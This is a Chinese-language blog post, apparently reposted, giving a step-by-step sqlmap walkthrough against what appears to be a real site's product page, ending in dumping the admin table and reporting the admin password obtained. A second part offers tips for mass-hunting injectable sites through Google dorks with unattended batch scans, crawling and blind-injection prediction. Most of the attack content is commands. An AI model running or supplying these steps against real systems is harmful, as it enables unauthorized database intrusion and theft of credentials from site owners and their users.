SQLMAP使用

 

1.sqlmap -u http://www.1234.net/product.asp?sid=53   获取基本信息,对注入点进行初步的判断和检测

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

已经判断出目标的系统和数据库类型。

2.sqlmap -u http://www.1234.net/product.asp?sid=53  --is-dba -v 1 判断数据库使用者是否DBA。

可以看出是DBA。

3. sqlmap -u http://www.1234.net/product.asp?sid=53  --users -v 0 列举数据库用户(是否SA)。

   sqlmap -u http://www.1234.net/product.asp?sid=53  --passwords -v 0 获取数据库密码。

   sqlmap -u http://www.1234.net/product.asp?sid=53  --privileges -v 0 判断当前权限。

   sqlmap -u http://www.1234.net/product.asp?sid=53  --dbs -v 0       列出所有数据库。

   sqlmap -u http://www.1234.net/product.asp?sid=53  --dump-all  -v 0 导出所有库。

kali上的sqlmap出错了,换BT5继续

4. ./sqlmap.py -u  http://www.1234.net/product.asp?sid=53 --tables (--current-db) 获取当前数据库

中的表(-D 指定数据库)

得到4个表。

5../sqlmap.py -u  http://www.1234.net/product.asp?sid=53 --columns -T admin -v 2  获取指定数据库(-D 指定数据库)

中指定表的字段

6.python sqlmap.py -u  http://www.1234.net/product.asp?sid=53 --dump -T admin -C"username,password"   

获取指定数据库名中指定表中指定字段的数据

成功得到admin密码。

____________________________________________________________________________________________________________

摘抄:

1.如何高效率使用 google 搜索注入点:

 sudo python sqlmap.py -g inurl:php?id=13 --smart --threads=10 --batch 

稍作解释:
--smart 规定只是粗略判断是否可注入,而不详细检测(否则会慢死)
--batch 规定不与用户进行任何交互(这样你就可以一边看片片一边跑注入)
PS:说实话,sqlmap 用 google 搜注入点的功能真的不如啊 D,明小子

2.如何用 sqlmap 实现爬行页面搜索注入点
sudo sqlmap.py -u "www.xxx.com/view.php?id=13" --crawl=3
--crawl 指定爬行深度
3.模拟智能手机
sudo sqlmap.py -u "www.xxx.com/view.php?id=13" --mobile
4.盲注时智能预测表名字段名
sudo sqlmap.py -u "www.xxx.com/view.php?id=13" --predict-output

 

 

 

 

转载于:https://www.cnblogs.com/aventador/p/3285953.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值